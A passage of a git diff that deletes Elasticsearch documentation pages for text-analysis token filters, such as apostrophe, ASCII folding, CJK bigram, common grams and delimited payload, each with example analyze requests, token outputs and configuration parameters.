-* If the parameter supports wildcards, ditto. -* For large or nested objects, consider linking to a separate definition list. -*************************************** -//// - -`foo`:: -(Optional, Boolean) -If `true`, do a cool thing. -Defaults to `false`. - -`baz`:: -(Optional, string) -Path to another cool thing. - -[[analysis-sample-tokenfilter-customize]] -==== Customize -//// -Example of a custom token filter with configurable parameters. -If the filter does not have any configurable parameters, skip this section. - -Guidelines -*************************************** -* If able, use a different tokenizer than used in "Add to an analyzer." -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -To customize the `sample` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `sample` filter with -`foo` set to `true`: - -[source,console] ----- -PUT sample_example -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "tokenizer": "whitespace", - "filter": [ "my_custom_sample_token_filter" ] - } - }, - "filter": { - "my_custom_sample_token_filter": { - "type": "sample", - "foo": true - } - } - } - } -} ----- -// TEST[skip: REMOVE THIS COMMENT.] diff --git a/docs/reference/analysis/tokenfilters/apostrophe-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/apostrophe-tokenfilter.asciidoc deleted file mode 100644 index 49c75e47af0..00000000000 --- a/docs/reference/analysis/tokenfilters/apostrophe-tokenfilter.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -[[analysis-apostrophe-tokenfilter]] -=== Apostrophe token filter -++++ -Apostrophe -++++ - -Strips all characters after an apostrophe, including the apostrophe itself. - -This filter is included in {es}'s built-in <>. It uses Lucene's -{lucene-analysis-docs}/tr/ApostropheFilter.html[ApostropheFilter], which was -built for the Turkish language. - - -[[analysis-apostrophe-tokenfilter-analyze-ex]] -==== Example - -The following <> request demonstrates how the -apostrophe token filter works. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["apostrophe"], - "text" : "Istanbul'a veya Istanbul'dan" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ Istanbul, veya, Istanbul ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "Istanbul", - "start_offset" : 0, - "end_offset" : 10, - "type" : "", - "position" : 0 - }, - { - "token" : "veya", - "start_offset" : 11, - "end_offset" : 15, - "type" : "", - "position" : 1 - }, - { - "token" : "Istanbul", - "start_offset" : 16, - "end_offset" : 28, - "type" : "", - "position" : 2 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-apostrophe-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -apostrophe token filter to configure a new -<>. 
- -[source,console] --------------------------------------------------- -PUT /apostrophe_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_apostrophe": { - "tokenizer": "standard", - "filter": [ "apostrophe" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/asciifolding-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/asciifolding-tokenfilter.asciidoc deleted file mode 100644 index 6b836f26dad..00000000000 --- a/docs/reference/analysis/tokenfilters/asciifolding-tokenfilter.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[[analysis-asciifolding-tokenfilter]] -=== ASCII folding token filter -++++ -ASCII folding -++++ - -Converts alphabetic, numeric, and symbolic characters that are not in the Basic -Latin Unicode block (first 127 ASCII characters) to their ASCII equivalent, if -one exists. For example, the filter changes `à` to `a`. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/ASCIIFoldingFilter.html[ASCIIFoldingFilter]. - -[[analysis-asciifolding-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `asciifolding` -filter to drop the diacritical marks in `açaí à la carte`: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["asciifolding"], - "text" : "açaí à la carte" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ acai, a, la, carte ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "acai", - "start_offset" : 0, - "end_offset" : 4, - "type" : "", - "position" : 0 - }, - { - "token" : "a", - "start_offset" : 5, - "end_offset" : 6, - "type" : "", - "position" : 1 - }, - { - "token" : "la", - "start_offset" : 7, - "end_offset" : 9, - "type" : "", - "position" : 2 - }, - { - "token" : "carte", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-asciifolding-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`asciifolding` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /asciifold_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_asciifolding": { - "tokenizer": "standard", - "filter": [ "asciifolding" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-asciifolding-tokenfilter-configure-parms]] -==== Configurable parameters - -`preserve_original`:: -(Optional, Boolean) -If `true`, emit both original tokens and folded tokens. -Defaults to `false`. - -[[analysis-asciifolding-tokenfilter-customize]] -==== Customize - -To customize the `asciifolding` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. 
- -For example, the following request creates a custom `asciifolding` filter with -`preserve_original` set to true: - -[source,console] --------------------------------------------------- -PUT /asciifold_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_asciifolding": { - "tokenizer": "standard", - "filter": [ "my_ascii_folding" ] - } - }, - "filter": { - "my_ascii_folding": { - "type": "asciifolding", - "preserve_original": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/cjk-bigram-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/cjk-bigram-tokenfilter.asciidoc deleted file mode 100644 index 4fd7164e82d..00000000000 --- a/docs/reference/analysis/tokenfilters/cjk-bigram-tokenfilter.asciidoc +++ /dev/null @@ -1,201 +0,0 @@ -[[analysis-cjk-bigram-tokenfilter]] -=== CJK bigram token filter -++++ -CJK bigram -++++ - -Forms {wikipedia}/Bigram[bigrams] out of CJK (Chinese, -Japanese, and Korean) tokens. - -This filter is included in {es}'s built-in <>. It uses Lucene's -{lucene-analysis-docs}/cjk/CJKBigramFilter.html[CJKBigramFilter]. - - -[[analysis-cjk-bigram-tokenfilter-analyze-ex]] -==== Example - -The following <> request demonstrates how the -CJK bigram token filter works. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["cjk_bigram"], - "text" : "東京都は、日本の首都であり" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ 東京, 京都, 都は, 日本, 本の, の首, 首都, 都で, であ, あり ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "東京", - "start_offset" : 0, - "end_offset" : 2, - "type" : "", - "position" : 0 - }, - { - "token" : "京都", - "start_offset" : 1, - "end_offset" : 3, - "type" : "", - "position" : 1 - }, - { - "token" : "都は", - "start_offset" : 2, - "end_offset" : 4, - "type" : "", - "position" : 2 - }, - { - "token" : "日本", - "start_offset" : 5, - "end_offset" : 7, - "type" : "", - "position" : 3 - }, - { - "token" : "本の", - "start_offset" : 6, - "end_offset" : 8, - "type" : "", - "position" : 4 - }, - { - "token" : "の首", - "start_offset" : 7, - "end_offset" : 9, - "type" : "", - "position" : 5 - }, - { - "token" : "首都", - "start_offset" : 8, - "end_offset" : 10, - "type" : "", - "position" : 6 - }, - { - "token" : "都で", - "start_offset" : 9, - "end_offset" : 11, - "type" : "", - "position" : 7 - }, - { - "token" : "であ", - "start_offset" : 10, - "end_offset" : 12, - "type" : "", - "position" : 8 - }, - { - "token" : "あり", - "start_offset" : 11, - "end_offset" : 13, - "type" : "", - "position" : 9 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-cjk-bigram-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -CJK bigram token filter to configure a new -<>. 
- -[source,console] --------------------------------------------------- -PUT /cjk_bigram_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_cjk_bigram": { - "tokenizer": "standard", - "filter": [ "cjk_bigram" ] - } - } - } - } -} --------------------------------------------------- - - -[[analysis-cjk-bigram-tokenfilter-configure-parms]] -==== Configurable parameters - -`ignored_scripts`:: -+ --- -(Optional, array of character scripts) -Array of character scripts for which to disable bigrams. -Possible values: - -* `han` -* `hangul` -* `hiragana` -* `katakana` - -All non-CJK input is passed through unmodified. --- - -`output_unigrams` -(Optional, Boolean) -If `true`, emit tokens in both bigram and -{wikipedia}/N-gram[unigram] form. If `false`, a CJK character -is output in unigram form when it has no adjacent characters. Defaults to -`false`. - -[[analysis-cjk-bigram-tokenfilter-customize]] -==== Customize - -To customize the CJK bigram token filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -[source,console] --------------------------------------------------- -PUT /cjk_bigram_example -{ - "settings": { - "analysis": { - "analyzer": { - "han_bigrams": { - "tokenizer": "standard", - "filter": [ "han_bigrams_filter" ] - } - }, - "filter": { - "han_bigrams_filter": { - "type": "cjk_bigram", - "ignored_scripts": [ - "hangul", - "hiragana", - "katakana" - ], - "output_unigrams": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/cjk-width-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/cjk-width-tokenfilter.asciidoc deleted file mode 100644 index e055d1783d4..00000000000 --- a/docs/reference/analysis/tokenfilters/cjk-width-tokenfilter.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[analysis-cjk-width-tokenfilter]] -=== CJK width token filter -++++ -CJK width -++++ - -Normalizes width differences in CJK (Chinese, Japanese, and Korean) characters -as follows: - -* Folds full-width ASCII character variants into the equivalent basic Latin -characters -* Folds half-width Katakana character variants into the equivalent Kana -characters - -This filter is included in {es}'s built-in <>. It uses Lucene's -{lucene-analysis-docs}/cjk/CJKWidthFilter.html[CJKWidthFilter]. - -NOTE: This token filter can be viewed as a subset of NFKC/NFKD Unicode -normalization. See the -{plugins}/analysis-icu-normalization-charfilter.html[`analysis-icu` plugin] for -full normalization support. - -[[analysis-cjk-width-tokenfilter-analyze-ex]] -==== Example - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["cjk_width"], - "text" : "シーサイドライナー" -} --------------------------------------------------- - -The filter produces the following token: - -[source,text] --------------------------------------------------- -シーサイドライナー --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "シーサイドライナー", - "start_offset" : 0, - "end_offset" : 10, - "type" : "", - "position" : 0 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-cjk-width-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -CJK width token filter to configure a new -<>. 
- -[source,console] --------------------------------------------------- -PUT /cjk_width_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_cjk_width": { - "tokenizer": "standard", - "filter": [ "cjk_width" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/classic-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/classic-tokenfilter.asciidoc deleted file mode 100644 index 8bab797a750..00000000000 --- a/docs/reference/analysis/tokenfilters/classic-tokenfilter.asciidoc +++ /dev/null @@ -1,147 +0,0 @@ -[[analysis-classic-tokenfilter]] -=== Classic token filter -++++ -Classic -++++ - -Performs optional post-processing of terms generated by the -<>. - -This filter removes the english possessive (`'s`) from the end of words and -removes dots from acronyms. It uses Lucene's -{lucene-analysis-docs}/standard/ClassicFilter.html[ClassicFilter]. - -[[analysis-classic-tokenfilter-analyze-ex]] -==== Example - -The following <> request demonstrates how the -classic token filter works. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "classic", - "filter" : ["classic"], - "text" : "The 2 Q.U.I.C.K. Brown-Foxes jumped over the lazy dog's bone." -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ The, 2, QUICK, Brown, Foxes, jumped, over, the, lazy, dog, bone ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "The", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "2", - "start_offset" : 4, - "end_offset" : 5, - "type" : "", - "position" : 1 - }, - { - "token" : "QUICK", - "start_offset" : 6, - "end_offset" : 16, - "type" : "", - "position" : 2 - }, - { - "token" : "Brown", - "start_offset" : 17, - "end_offset" : 22, - "type" : "", - "position" : 3 - }, - { - "token" : "Foxes", - "start_offset" : 23, - "end_offset" : 28, - "type" : "", - "position" : 4 - }, - { - "token" : "jumped", - "start_offset" : 29, - "end_offset" : 35, - "type" : "", - "position" : 5 - }, - { - "token" : "over", - "start_offset" : 36, - "end_offset" : 40, - "type" : "", - "position" : 6 - }, - { - "token" : "the", - "start_offset" : 41, - "end_offset" : 44, - "type" : "", - "position" : 7 - }, - { - "token" : "lazy", - "start_offset" : 45, - "end_offset" : 49, - "type" : "", - "position" : 8 - }, - { - "token" : "dog", - "start_offset" : 50, - "end_offset" : 55, - "type" : "", - "position" : 9 - }, - { - "token" : "bone", - "start_offset" : 56, - "end_offset" : 60, - "type" : "", - "position" : 10 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-classic-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -classic token filter to configure a new -<>. 
- -[source,console] --------------------------------------------------- -PUT /classic_example -{ - "settings": { - "analysis": { - "analyzer": { - "classic_analyzer": { - "tokenizer": "classic", - "filter": [ "classic" ] - } - } - } - } -} --------------------------------------------------- - diff --git a/docs/reference/analysis/tokenfilters/common-grams-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/common-grams-tokenfilter.asciidoc deleted file mode 100644 index 4913df9290c..00000000000 --- a/docs/reference/analysis/tokenfilters/common-grams-tokenfilter.asciidoc +++ /dev/null @@ -1,228 +0,0 @@ -[[analysis-common-grams-tokenfilter]] -=== Common grams token filter -++++ -Common grams -++++ - -Generates {wikipedia}/Bigram[bigrams] for a specified set of -common words. - -For example, you can specify `is` and `the` as common words. This filter then -converts the tokens `[the, quick, fox, is, brown]` to `[the, the_quick, quick, -fox, fox_is, is, is_brown, brown]`. - -You can use the `common_grams` filter in place of the -<> when you don't want to -completely ignore common words. - -This filter uses Lucene's -{lucene-analysis-docs}/commongrams/CommonGramsFilter.html[CommonGramsFilter]. - -[[analysis-common-grams-analyze-ex]] -==== Example - -The following <> request creates bigrams for `is` -and `the`: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "whitespace", - "filter" : [ - { - "type": "common_grams", - "common_words": ["is", "the"] - } - ], - "text" : "the quick fox is brown" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, the_quick, quick, fox, fox_is, is, is_brown, brown ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0 - }, - { - "token" : "the_quick", - "start_offset" : 0, - "end_offset" : 9, - "type" : "gram", - "position" : 0, - "positionLength" : 2 - }, - { - "token" : "quick", - "start_offset" : 4, - "end_offset" : 9, - "type" : "word", - "position" : 1 - }, - { - "token" : "fox", - "start_offset" : 10, - "end_offset" : 13, - "type" : "word", - "position" : 2 - }, - { - "token" : "fox_is", - "start_offset" : 10, - "end_offset" : 16, - "type" : "gram", - "position" : 2, - "positionLength" : 2 - }, - { - "token" : "is", - "start_offset" : 14, - "end_offset" : 16, - "type" : "word", - "position" : 3 - }, - { - "token" : "is_brown", - "start_offset" : 14, - "end_offset" : 22, - "type" : "gram", - "position" : 3, - "positionLength" : 2 - }, - { - "token" : "brown", - "start_offset" : 17, - "end_offset" : 22, - "type" : "word", - "position" : 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-common-grams-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`common_grams` filter to configure a new -<>: - -[source,console] --------------------------------------------------- -PUT /common_grams_example -{ - "settings": { - "analysis": { - "analyzer": { - "index_grams": { - "tokenizer": "whitespace", - "filter": [ "common_grams" ] - } - }, - "filter": { - "common_grams": { - "type": "common_grams", - "common_words": [ "a", "is", "the" ] - } - } - } - } -} 
--------------------------------------------------- - -[[analysis-common-grams-tokenfilter-configure-parms]] -==== Configurable parameters - -`common_words`:: -+ --- -(Required+++*+++, array of strings) -A list of tokens. The filter generates bigrams for these tokens. - -Either this or the `common_words_path` parameter is required. --- - -`common_words_path`:: -+ --- -(Required+++*+++, string) -Path to a file containing a list of tokens. The filter generates bigrams for -these tokens. - -This path must be absolute or relative to the `config` location. The file must -be UTF-8 encoded. Each token in the file must be separated by a line break. - -Either this or the `common_words` parameter is required. --- - -`ignore_case`:: -(Optional, Boolean) -If `true`, matches for common words matching are case-insensitive. -Defaults to `false`. - -`query_mode`:: -+ --- -(Optional, Boolean) -If `true`, the filter excludes the following tokens from the output: - -* Unigrams for common words -* Unigrams for terms followed by common words - -Defaults to `false`. We recommend enabling this parameter for -<>. - -For example, you can enable this parameter and specify `is` and `the` as -common words. This filter converts the tokens `[the, quick, fox, is, brown]` to -`[the_quick, quick, fox_is, is_brown,]`. --- - -[[analysis-common-grams-tokenfilter-customize]] -==== Customize - -To customize the `common_grams` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `common_grams` filter with -`ignore_case` and `query_mode` set to `true`: - -[source,console] --------------------------------------------------- -PUT /common_grams_example -{ - "settings": { - "analysis": { - "analyzer": { - "index_grams": { - "tokenizer": "whitespace", - "filter": [ "common_grams_query" ] - } - }, - "filter": { - "common_grams_query": { - "type": "common_grams", - "common_words": [ "a", "is", "the" ], - "ignore_case": true, - "query_mode": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/condition-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/condition-tokenfilter.asciidoc deleted file mode 100644 index a33a41e85a8..00000000000 --- a/docs/reference/analysis/tokenfilters/condition-tokenfilter.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ -[[analysis-condition-tokenfilter]] -=== Conditional token filter -++++ -Conditional -++++ - -Applies a set of token filters to tokens that match conditions in a provided -predicate script. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/ConditionalTokenFilter.html[ConditionalTokenFilter]. - -[[analysis-condition-analyze-ex]] -==== Example - -The following <> request uses the `condition` -filter to match tokens with fewer than 5 characters in `THE QUICK BROWN FOX`. -It then applies the <> filter to -those matching tokens, converting them to lowercase. 
- -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "condition", - "filter": [ "lowercase" ], - "script": { - "source": "token.getTerm().length() < 5" - } - } - ], - "text": "THE QUICK BROWN FOX" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, QUICK, BROWN, fox ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "QUICK", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "BROWN", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 2 - }, - { - "token" : "fox", - "start_offset" : 16, - "end_offset" : 19, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-condition-tokenfilter-configure-parms]] -==== Configurable parameters - -`filter`:: -+ --- -(Required, array of token filters) -Array of token filters. If a token matches the predicate script in the `script` -parameter, these filters are applied to the token in the order provided. - -These filters can include custom token filters defined in the index mapping. --- - -`script`:: -+ --- -(Required, <>) -Predicate script used to apply token filters. If a token -matches this script, the filters in the `filter` parameter are applied to the -token. - -For valid parameters, see <<_script_parameters>>. Only inline scripts are -supported. Painless scripts are executed in the -{painless}/painless-analysis-predicate-context.html[analysis predicate context] -and require a `token` property. --- - -[[analysis-condition-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `condition` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `condition` filter to configure a new -<>. The custom `condition` filter -matches the first token in a stream. It then reverses that matching token using -the <> filter. - -[source,console] --------------------------------------------------- -PUT /palindrome_list -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_reverse_first_token": { - "tokenizer": "whitespace", - "filter": [ "reverse_first_token" ] - } - }, - "filter": { - "reverse_first_token": { - "type": "condition", - "filter": [ "reverse" ], - "script": { - "source": "token.getPosition() === 0" - } - } - } - } - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/decimal-digit-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/decimal-digit-tokenfilter.asciidoc deleted file mode 100644 index 6436bad8ac3..00000000000 --- a/docs/reference/analysis/tokenfilters/decimal-digit-tokenfilter.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[analysis-decimal-digit-tokenfilter]] -=== Decimal digit token filter -++++ -Decimal digit -++++ - -Converts all digits in the Unicode `Decimal_Number` General Category to `0-9`. -For example, the filter changes the Bengali numeral `৩` to `3`. 
- -This filter uses Lucene's -{lucene-analysis-docs}/core/DecimalDigitFilter.html[DecimalDigitFilter]. - -[[analysis-decimal-digit-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `decimal_digit` -filter to convert Devanagari numerals to `0-9`: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "whitespace", - "filter" : ["decimal_digit"], - "text" : "१-one two-२ ३" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ 1-one, two-2, 3] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "1-one", - "start_offset" : 0, - "end_offset" : 5, - "type" : "word", - "position" : 0 - }, - { - "token" : "two-2", - "start_offset" : 6, - "end_offset" : 11, - "type" : "word", - "position" : 1 - }, - { - "token" : "3", - "start_offset" : 12, - "end_offset" : 13, - "type" : "word", - "position" : 2 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-decimal-digit-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`decimal_digit` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /decimal_digit_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_decimal_digit": { - "tokenizer": "whitespace", - "filter": [ "decimal_digit" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/delimited-payload-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/delimited-payload-tokenfilter.asciidoc deleted file mode 100644 index 0bcc1ca12c3..00000000000 --- a/docs/reference/analysis/tokenfilters/delimited-payload-tokenfilter.asciidoc +++ /dev/null @@ -1,324 +0,0 @@ -[[analysis-delimited-payload-tokenfilter]] -=== Delimited payload token filter -++++ -Delimited payload -++++ - -[WARNING] -==== -The older name `delimited_payload_filter` is deprecated and should not be used -with new indices. Use `delimited_payload` instead. -==== - -Separates a token stream into tokens and payloads based on a specified -delimiter. - -For example, you can use the `delimited_payload` filter with a `|` delimiter to -split `the|1 quick|2 fox|3` into the tokens `the`, `quick`, and `fox` -with respective payloads of `1`, `2`, and `3`. - -This filter uses Lucene's -{lucene-analysis-docs}/payloads/DelimitedPayloadTokenFilter.html[DelimitedPayloadTokenFilter]. - -[NOTE] -.Payloads -==== -A payload is user-defined binary data associated with a token position and -stored as base64-encoded bytes. - -{es} does not store token payloads by default. To store payloads, you must: - -* Set the <> mapping parameter to - `with_positions_payloads` or `with_positions_offsets_payloads` for any field - storing payloads. -* Use an index analyzer that includes the `delimited_payload` filter - -You can view stored payloads using the <>. -==== - -[[analysis-delimited-payload-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`delimited_payload` filter with the default `|` delimiter to split -`the|0 brown|10 fox|5 is|0 quick|10` into tokens and payloads. 
- -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": ["delimited_payload"], - "text": "the|0 brown|10 fox|5 is|0 quick|10" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, brown, fox, is, quick ] --------------------------------------------------- - -Note that the analyze API does not return stored payloads. For an example that -includes returned payloads, see -<>. - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "brown", - "start_offset": 6, - "end_offset": 14, - "type": "word", - "position": 1 - }, - { - "token": "fox", - "start_offset": 15, - "end_offset": 20, - "type": "word", - "position": 2 - }, - { - "token": "is", - "start_offset": 21, - "end_offset": 25, - "type": "word", - "position": 3 - }, - { - "token": "quick", - "start_offset": 26, - "end_offset": 34, - "type": "word", - "position": 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-delimited-payload-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`delimited-payload` filter to configure a new <>. - -[source,console] --------------------------------------------------- -PUT delimited_payload -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_delimited_payload": { - "tokenizer": "whitespace", - "filter": [ "delimited_payload" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-delimited-payload-tokenfilter-configure-parms]] -==== Configurable parameters - -`delimiter`:: -(Optional, string) -Character used to separate tokens from payloads. Defaults to `|`. - -`encoding`:: -+ --- -(Optional, string) -Data type for the stored payload. Valid values are: - -`float`::: -(Default) Float - -`identity`::: -Characters - -`int`::: -Integer --- - -[[analysis-delimited-payload-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `delimited_payload` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `delimited_payload` filter to configure a new -<>. The custom `delimited_payload` -filter uses the `+` delimiter to separate tokens from payloads. Payloads are -encoded as integers. - -[source,console] --------------------------------------------------- -PUT delimited_payload_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_plus_delimited": { - "tokenizer": "whitespace", - "filter": [ "plus_delimited" ] - } - }, - "filter": { - "plus_delimited": { - "type": "delimited_payload", - "delimiter": "+", - "encoding": "int" - } - } - } - } -} --------------------------------------------------- - -[[analysis-delimited-payload-tokenfilter-return-stored-payloads]] -==== Return stored payloads - -Use the <> to create an index that: - -* Includes a field that stores term vectors with payloads. -* Uses a <> with the - `delimited_payload` filter. 
- -[source,console] --------------------------------------------------- -PUT text_payloads -{ - "mappings": { - "properties": { - "text": { - "type": "text", - "term_vector": "with_positions_payloads", - "analyzer": "payload_delimiter" - } - } - }, - "settings": { - "analysis": { - "analyzer": { - "payload_delimiter": { - "tokenizer": "whitespace", - "filter": [ "delimited_payload" ] - } - } - } - } -} --------------------------------------------------- - -Add a document containing payloads to the index. - -[source,console] --------------------------------------------------- -POST text_payloads/_doc/1 -{ - "text": "the|0 brown|3 fox|4 is|0 quick|10" -} --------------------------------------------------- -// TEST[continued] - -Use the <> to return the document's tokens -and base64-encoded payloads. - -[source,console] --------------------------------------------------- -GET text_payloads/_termvectors/1 -{ - "fields": [ "text" ], - "payloads": true -} --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "text_payloads", - "_type": "_doc", - "_id": "1", - "_version": 1, - "found": true, - "took": 8, - "term_vectors": { - "text": { - "field_statistics": { - "sum_doc_freq": 5, - "doc_count": 1, - "sum_ttf": 5 - }, - "terms": { - "brown": { - "term_freq": 1, - "tokens": [ - { - "position": 1, - "payload": "QEAAAA==" - } - ] - }, - "fox": { - "term_freq": 1, - "tokens": [ - { - "position": 2, - "payload": "QIAAAA==" - } - ] - }, - "is": { - "term_freq": 1, - "tokens": [ - { - "position": 3, - "payload": "AAAAAA==" - } - ] - }, - "quick": { - "term_freq": 1, - "tokens": [ - { - "position": 4, - "payload": "QSAAAA==" - } - ] - }, - "the": { - "term_freq": 1, - "tokens": [ - { - "position": 0, - "payload": "AAAAAA==" - } - ] - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 8/"took": "$body.took"/] diff --git a/docs/reference/analysis/tokenfilters/dictionary-decompounder-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/dictionary-decompounder-tokenfilter.asciidoc deleted file mode 100644 index 0e3c5804f26..00000000000 --- a/docs/reference/analysis/tokenfilters/dictionary-decompounder-tokenfilter.asciidoc +++ /dev/null @@ -1,173 +0,0 @@ -[[analysis-dict-decomp-tokenfilter]] -=== Dictionary decompounder token filter -++++ -Dictionary decompounder -++++ - -[NOTE] -==== -In most cases, we recommend using the faster -<> token filter -in place of this filter. However, you can use the -`dictionary_decompounder` filter to check the quality of a word list before -implementing it in the `hyphenation_decompounder` filter. -==== - -Uses a specified list of words and a brute force approach to find subwords in -compound words. If found, these subwords are included in the token output. - -This filter uses Lucene's -{lucene-analysis-docs}/compound/DictionaryCompoundWordTokenFilter.html[DictionaryCompoundWordTokenFilter], -which was built for Germanic languages. - -[[analysis-dict-decomp-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`dictionary_decompounder` filter to find subwords in `Donaudampfschiff`. The -filter then checks these subwords against the specified list of words: `Donau`, -`dampf`, `meer`, and `schiff`. 
